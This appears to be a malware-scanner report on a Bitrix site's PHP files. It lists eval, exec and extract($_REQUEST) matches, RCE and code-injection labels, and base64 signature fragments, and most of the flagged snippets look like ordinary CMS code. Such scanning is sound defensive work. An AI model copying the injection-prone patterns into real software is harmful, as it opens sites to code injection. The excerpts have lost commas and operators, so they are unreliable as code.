<? } public function DisplayList($arParams = array()) { $menu = new CAdminPopup($this->table_id."_menu"$this->table_id."_menu"); $menu->Show(); if ($this->isAjaxDebug()) { ech...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/public/menu_edit.php

Size: 21.31 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(\''.$out.'\');'?>

    var arCellsHTML = [
        '<span class="rowcontrol drag" title="<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_DRAG'))?>"></span>',
        getAreaHTML('text_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_TEXT_EDIT'))?>'),
        getAreaHTML('link_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_LINK_EDIT'))?>'),
        '<span onclick="if (!GLOBAL_bDisableActions) {currentLink = \'' + nums + '\'; OpenFileBrowserWindFile_' + nums + '();}" class="rowcontrol...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/update_client.php

Size: 257.47 kB Created: 2022-12-26 07:32:44 Modified: 2025-02-03 05:36:38 Warns: 2 Dangers: 15
DescriptionMatch

Exploit infected_comment Line: 1 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*PATCH*/

Exploit silenced_eval Line: 1 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($GLOBALS['____9471607'][885](array('<?php''<?''?>')

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($_808017524); else $_1828906802___159488183(134);} catch(Exception $_1224328102){ $_1828906802___159488183(135).$_1224328102->getCode().___159488183(136).$_1224328102->getMessage();} $_482517401 .= ___159488183(137).$GLOBALS['____9471607'][51]($_327810548[___159488183(138)][___159488183(139)]).___159488183(140).$GLOBALS['____9471607'][52]($_1828906802);}} if(empty($_547990182)){ CUpdateClient::AddMessage2Log($GLOBALS['____9471607'][53](___159488183(141), ___159488183(142), $_482517401))...

Sign 34b7e999 Line: 1 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

Sign 7186bb8d Line: 1 Dangerous

Malware Signature (hash: 7186bb8d)

RlZmluZ

Sign 7830f7a6 Line: 1 Dangerous

Malware Signature (hash: 7830f7a6)

N5c3Rlb

Sign 7f5d33bf Line: 1 Dangerous

Malware Signature (hash: 7f5d33bf)

JlcGxhY2

Sign 91535293 Line: 1 Dangerous

Malware Signature (hash: 91535293)

luY2x1ZG

Sign 963e968a Line: 1 Dangerous

Malware Signature (hash: 963e968a)

pbmNsdWRl

Sign 99fc3b9d Line: 1 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign a408f408 Line: 1 Dangerous

Malware Signature (hash: a408f408)

c3RyX

Sign ae7830db Line: 1 Dangerous

Malware Signature (hash: ae7830db)

YXJyYXlf

Sign d30fc49e Line: 1 Dangerous

Malware Signature (hash: d30fc49e)

b3Blb

Sign d97f004d Line: 1 Dangerous

Malware Signature (hash: d97f004d)

ZXhlYy

Sign de12c454 Line: 1 Dangerous

Malware Signature (hash: de12c454)

vcGVu

Sign ee1cb326 Line: 1 Dangerous

Malware Signature (hash: ee1cb326)

9wZW

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

'base64_decode'

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/controller_member.php

Size: 41.54 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($disconnect_command); COption::SetOptionString("main""controller_member""N"); } public static function GetBackup($bRefresh false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh$arCachedData unserialize(COption::GetOptionString("main""~controller_backup"""), ['allowed_classes' => false]); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main""~controller_backup"serialize($arBackup)); CControllerClient::GetBackup(...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/site_checker.php

Size: 92.20 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1 Dangers: 2
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('catdoc -V'$output$return_var); if ($return_var === 0) { $version $output[0]; if (strpos($version'0.94.4') !== false || strpos($version'0.94.3') !== false$strError .= GetMessage('MAIN_CATDOC_WARN', array('#VERSION#' => $version)); } } return $this->Result(false$strError); } function check_fast_download() { $tmp $_SERVER['DOCUMENT_ROOT'].'/bitrix/tmp/success.txt'; if (!CheckDirPath($tmp) || !file_put_contents($tmp'SUCCESS')) return $this->Result(falseGetMessage("MAIN_TMP_...

Sign 471b95ee Line: 553 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

Sign 471b95ee Line: 555 Dangerous

Malware Signature (hash: 471b95ee)

SUHOSIN

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/vuln_scanner.php

Size: 64.49 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Sign f9dc0a55 Line: 1969 Dangerous

Malware Signature (hash: f9dc0a55)

'base64_decode'

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/menu.php

Size: 15.60 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) $bSkipMenuItem true; } if(!$bSkipMenuItem$ITEM_INDEX++; if(($pos mb_strpos($LINK"?"))!==false$ITEM_TYPE "U"; elseif(mb_substr($LINK, -1) == "/"$ITEM_TYPE "D"; else $ITEM_TYPE "P"$SELECTED false; if($bCached) { $all_links $arMenuCache[$iMenuItem]["LINKS"]; if(!is_array($all_links)) $all_links = array(); } else { $all_links = array(); if(is_array($ADDITIONAL_LINKS)) { foreach($ADDITIONAL_LINKS as $link) { $tested_link trim(Rel2Abs($this->M...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/update_list.php

Size: 1.20 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("parent."+this.name+"_"+str);
    }
    catch(
e){}
}
</
script>

</
head>
<
body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="white">

<
table width="100%" border="0" id="updates_items">
</
table>

</
body>
</
html>
<? require(
$_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php")

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/site.php

Size: 26.03 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1 Dangers: 1
DescriptionMatch

Exploit silenced_eval Line: 883 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("return ".$strCondition.";")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$strCondition.";"))) { continue; } if(($path getLocalPath("templates/".$ar["TEMPLATE"], BX_PERSONAL_ROOT)) !== false && is_dir($_SERVER["DOCUMENT_ROOT"].$path)) { $siteTemplate $ar["TEMPLATE"]; break; } } } else { if($CACHE_MANAGER->Read(CACHED_b_site_template"b_site_template")) { $arSiteTemplateBySite $CACHE_MANAGER->Get("b_site_template"); } else { $dbr $connection->query("
                    SELECT
                        "
.$conditionQuoted.",
                        TEMPLATE,
                        SITE_ID
                    FROM
                        b_si...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/update_client_partner.php

Size: 74.87 kB Created: 2022-12-26 07:32:44 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 1079 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*PATCH*/

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/zip.php

Size: 66.39 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('$res = '.$arParams['callback_pre_add'].'(\'callback_pre_add\', $arLocalHeader);'); if ($res == 0) { $arHeader['status'] = "skipped"$res 1; } if ($arHeader['stored_filename'] != $arLocalHeader['stored_filename']) { $arHeader['stored_filename'] = $this->_reducePath($arLocalHeader['stored_filename']); } } if ($arHeader['stored_filename'] == "") { $arHeader['status'] = "filtered"; } if (mb_strlen($arHeader['stored_filename']) > 0xFF) { $arHeader['status'] = 'filename_too_long'; } if ($arHe...

Sign 963e968a Line: 2567 Dangerous

Malware Signature (hash: 963e968a)

php_uname()

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/update_class.php

Size: 151.28 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1 Dangers: 2
DescriptionMatch

Exploit silenced_eval Line: 3274 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\"),(\$order=\"\"),array(\"ACTIVE\"=>\"Y\"));\$cnt=0;while(\$ar_"."res=\$path->Fe"."tch())\$cnt++;"); return $cnt;} } public static function GetModuleVersion($module) { if ($module == '') return false$strModule_tmp_dir $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module; if (file_exists($strModule_tmp_dir) && is_dir($strModule_tmp_dir)) { if ($module != "main") { if (file_exists($strModule_tmp_dir."/install/index.php")) { $arModule_tmp_i...

Sign 696317c4 Line: 3274 Dangerous

Malware Signature (hash: 696317c4)

@eval("\

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/database.php

Size: 32.31 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 36 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/main.php

Size: 92.09 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("?>".$fTmp->GetContents()); } $FILE_PERM $PERM[$path_file]; if(!is_array($FILE_PERM)) $FILE_PERM = array(); if(!$bOverWrite && count($FILE_PERM)>0) return true$bDiff false$str="<?\n"; foreach($arPermissions as $group=>$perm) { if($perm <> ''$str .= "\$PERM[\"".EscapePHPString($path_file)."\"][\"".EscapePHPString($group)."\"]=\"".EscapePHPString($perm)."\";\n"; if(!$bDiff) { $curr_perm $FILE_PERM[$group]; if(!isset($curr_perm) && preg_match('/^G[0-9]+$/'$group)) $curr_perm $F...

Sign 11413268 Line: 1600 Dangerous

Malware Signature (hash: 11413268)

eval("?>

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/update_update.php

Size: 89.67 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("DescrDetList_"+sModule));
            
wnd.document.write('</font>');
            
wnd.document.write('\n</body></html>');
        }
        
//-->
        
</script>

        <
table border="0" cellspacing="1" cellpadding="2" width="99%">
        <
tr>
            <
td align="center" class="tablehead1"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DATE"?></font></td>
            <td align="center" class="tablehead2"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DESCR"?></font></td>
            <td align="center" class="tablehead3"><font class="tablehe...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/update_b24.php

Size: 12.22 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function syslog Warning

Potentially dangerous function `syslog`

[https://www.php.net/syslog]

syslog(LOG_INFO$_SERVER["HTTP_HOST"]."\tstart\t".$moduleId.$arUpdaters[$i1][0]); CUpdateClient::RunUpdaterScript($this->updatersDir.$moduleId.$arUpdaters[$i1][0], $errorMessageTmp""$moduleId); syslog(LOG_INFO$_SERVER["HTTP_HOST"]."\tend\t".$moduleId.$arUpdaters[$i1][0]."\t".$errorMessageTmp); if ($errorMessageTmp <> '') { $errorMessage .= str_replace("#MODULE#"$moduleIdstr_replace("#VER#"$arUpdaters[$i1][1], GetMessage("SUPP_UK_UPDN_ERR"))).": ".$errorMessageTmp."."; } $this->Colle...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/general/jscore.php

Size: 16.43 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ua) != null)
                        {
                            
rv parseFloat(RegExp.$1);
                        }
                    }
                    else if (
n.appName == "Netscape")
                    {
                        
rv 11;
                        
re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
                        if (
re.exec(ua) != null)
                        {
                            
rv parseFloat(RegExp.$1);
                        }
                    }
                }

                return 
rv;
            }

        })(
windowdocumentnavigator);
JS;
return 
'<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n""\t"), ""$js)."</script>"; } public static function GetScrip...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/mysql/database.php

Size: 23.54 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 138 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/home/web/web/vsavto.com/public_html/bitrix/modules/main/classes/mysql/agent.php

Size: 5.21 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$eval_result=".$arAgent["NAME"]); } catch (Exception $e) { CTimeZone::Enable(); $application = \Bitrix\Main\Application::getInstance(); $exceptionHandler $application->getExceptionHandler(); $exceptionHandler->writeToLog($e); continue; } CTimeZone::Enable(); if ($logFunction$logFunction($arAgent"finish"$eval_result$e); if ($e === false) { continue; } elseif ($eval_result == '') { $strSql "DELETE FROM b_agent WHERE ID = ".$arAgent["ID"]; } else { if ($logFunction && function_ex...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/wizard_sol/utils.php

Size: 13.56 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("?>".file_get_contents($documentRoot.$pathDir."/.access.php")); } if (!isset($PERM[$pathFile]) || !is_array($PERM[$pathFile])) $arPermisson $permissions; else $arPermisson $permissions $PERM[$pathFile]; return $GLOBALS["APPLICATION"]->SetFileAccessPermission($originalPath$arPermisson); } public static function AddMenuItem($menuFile$menuItem$siteID$pos = -1) { if (CModule::IncludeModule('fileman')) { $arResult CFileMan::GetMenuArray($_SERVER["DOCUMENT_ROOT"].$menuFile); $arMe...

Sign 11413268 Line: 324 Dangerous

Malware Signature (hash: 11413268)

eval("?>

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/templates/main/profile.php

Size: 28.92 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 7 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_POSTEXTR_SKIP)

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/templates/main/auth/authorize_registration.php

Size: 6.89 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/templates/main/auth/forgot_password.php

Size: 2.54 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/templates/main/auth/authorize.php

Size: 3.78 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/templates/main/auth/registration.php

Size: 6.24 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/templates/main/auth/change_password.php

Size: 3.49 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/templates/main/map/default.php

Size: 13.56 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1 Dangers: 2
DescriptionMatch

Exploit extract_global Line: 14 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

Exploit silenced_eval Line: 220 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("return ".$CONDITION.";")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } if ($aMenu[1] <> '') { $search_child true; if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$aMenu[1])) $full_path $aMenu[1]; else $full_path trim(Rel2Abs($PARENT_PATH$aMenu[1])); } else { $search_child false$full_path $PARENT_PATH; } if ($full_path <> '') { $FILE_ACCESS = (preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$full_path)) ? "R" $APPLICATION->GetFileAccessPermission($full_path); if ($FILE_ACCESS!="D" && $aMen...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/bitrix/index.php

Size: 83.00 B Created: 2022-12-02 17:29:48 Modified: 2025-02-03 05:36:38 Dangers: 1
DescriptionMatch

Sign 0f37c730 Line: 2 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/components/bitrix/main.ui.grid/templates/.default/template.php

Size: 49.30 kB Created: 2022-12-02 17:29:50 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
        var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
        var Grid = BX.Main.gridManager.getById('<?=\CUtil::JSEscape($arParams["GRID_ID"])?>');
        var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);
        var currentPage = '<?=\CUtil::JSEscape($arParams["CURRENT_PAGE"])?>';

        Grid = Grid ? Grid.instance : null;

        if (Grid)
        {
            Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
            Grid.arPa...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/components/bitrix/main.map/component.php

Size: 5.84 kB Created: 2022-12-02 17:29:53 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } $search_child false$search_path ''$full_path ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$aMenu[1])) { $full_path $aMenu[1]; } else { $full_path trim(Rel2Abs(mb_substr($PARENT_PATHmb_strlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos mb_strrpos($full_path"/"); if ($slash_pos !== false) { $page mb_substr($full_path$slash_pos 1); if(($pos mb_strpos($page'?')) !== false$pag...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/install/wizard/wizard.php

Size: 119.27 kB Created: 2022-12-02 17:29:53 Modified: 2025-02-03 05:36:39 Dangers: 2
DescriptionMatch

Exploit download_remote_code2 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($handler'<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")

Exploit download_remote_code2 Line: 3625 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($handler,
            
'<'.'?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/data/connectionpool.php

Size: 6.78 kB Created: 2022-12-02 17:29:55 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 26 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/data/configurator/redisconnectionconfigurator.php

Size: 2.87 kB Created: 2022-12-02 17:29:55 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 76 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/db/connection.php

Size: 23.83 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 315 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/orm/query/query.php

Size: 94.90 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->is_executing true$query $this->buildQuery(); $cacheId ""$ttl 0$result null; if($this->cacheTtl && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl $this->entity->getCacheTtl($this->cacheTtl); } if($ttl 0) { $cacheId md5($query); $result $this->entity->readFromCache($ttl$cacheId$this->countTotal); } if($result === null) { $result $this->query($query); if($ttl 0) { $result $this->entity->writeToCache($result$cacheId$this->count...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/orm/entity.php

Size: 31.50 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($eval); $entity self::getInstance($entity_name); foreach ($fieldsMap as $k => $v) { $entity->addField($v$k); } return $entity; } public static function compileEntity($entityName$fields null$parameters = array()) { $classCode ''$classCodeEnd ''; if (strtolower(substr($entityName, -5)) !== 'table') { $entityName .= 'Table'; } if (!preg_match('/^[a-z0-9_]+$/i'$entityName)) { throw new Main\ArgumentException(sprintf'Invalid entity className `%s`.'$entityName )); } $fullEnt...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/orm/annotations/annotationtrait.php

Size: 20.29 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec()"; $code[] = "\* @method {$objectClassfetchObject()"; $code[] = "\* @method {$collectionClassfetchCollection()"; $code[] = "\*"; $code[] = "\Custom methods:"; $code[] = "\* ---------------"; $code[] = "\*"; foreach (get_class_methods($dataClass) as $method) { if (substr($method, 0, 4) === 'with') { $reflectionMethod = new \ReflectionMethod($dataClass$method); if ($reflectionMethod->isStatic()) { $arguments = []; foreach (array_slice($reflectionMethod->getParameters(), 1...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/ui/fileinputunclouder.php

Size: 3.02 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($mode "basic"$params = array()) { $res $this->check($params); if ($this->check($params)) { $this->file = \CFile::getByID($this->id)->fetch(); if ($mode == "resize" && ($file = \CFile::ResizeImageGet($this->id$paramsBX_RESIZE_IMAGE_PROPORTIONALtruefalsetrue)) && $file) { $this->file["SRC"] = $file["src"]; $this->file["WIDTH"] = $file["width"]; $this->file["HEIGHT"] = $file["height"]; $this->file["FILE_SIZE"] = $file["size"]; } \CFile::ViewByUser($this->file, array("force_down...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/ui/fileinputreceiver.php

Size: 2.07 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->getAgent()->checkPost()

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/mail/eventmessagethemecompiler.php

Size: 10.12 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('use \Bitrix\Main\Mail\EventMessageThemeCompiler; ob_start();?>' $template '<? return ob_get_clean();'); } catch(StopException $e) { ob_clean(); throw $e; } return $result; } protected function addReplaceCallback($identificator$callback) { $this->replaceCallback[$identificator] = $callback; } protected function executeReplaceCallback() { $arReplaceIdentificators = array(); $arReplaceStrings = array(); foreach($this->replaceCallback as $identificator => $callback) { $result call_user...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/diag/syslogger.php

Size: 1.06 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function syslog Warning

Potentially dangerous function `syslog`

[https://www.php.net/syslog]

syslog(static::$supportedLevels[$level], $message); } public static function priorityToLevel(int $priority) { static $levels null; if ($levels === null) { $levels array_flip(static::$supportedLevels)

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lib/userconsent/internals/componentcontroller.php

Size: 1.99 kB Created: 2022-12-02 17:29:56 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse()

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lang/en/classes/update_client.php

Size: 24.45 kB Created: 2022-12-02 17:29:57 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of websites using this product installation."; $MESS["SUP_CHECK_PROMT_21"] = "You can add unlimited number of users for the current product co...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lang/en/classes/general/update_client.php

Size: 24.45 kB Created: 2022-12-02 17:29:57 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of websites using this product installation."; $MESS["SUP_CHECK_PROMT_21"] = "You can add unlimited number of users for the current product co...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lang/en/classes/general/update_update.php

Size: 22.66 kB Created: 2022-12-02 17:29:57 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install it first."; $MESS["SUP_SRC_ACT_ALT"] = "Download source code"; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_SITES_PROMT"] = "You cannot create more than #NUM# site#END# using this kernel according to your license. If you need more sites, you can buy them any time. After you have purchased the additional sites, you will have to add them to the system."; $MESS["SUP_SITES_AC...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lang/en/classes/general/update_update5.php

Size: 25.89 kB Created: 2022-12-02 17:29:57 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of wesbsites using this product installation."; $MESS["SUP_CHECK_PROMT_1"] = "You can extend your period of technical support, purchase additi...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lang/en/admin/site_checker.php

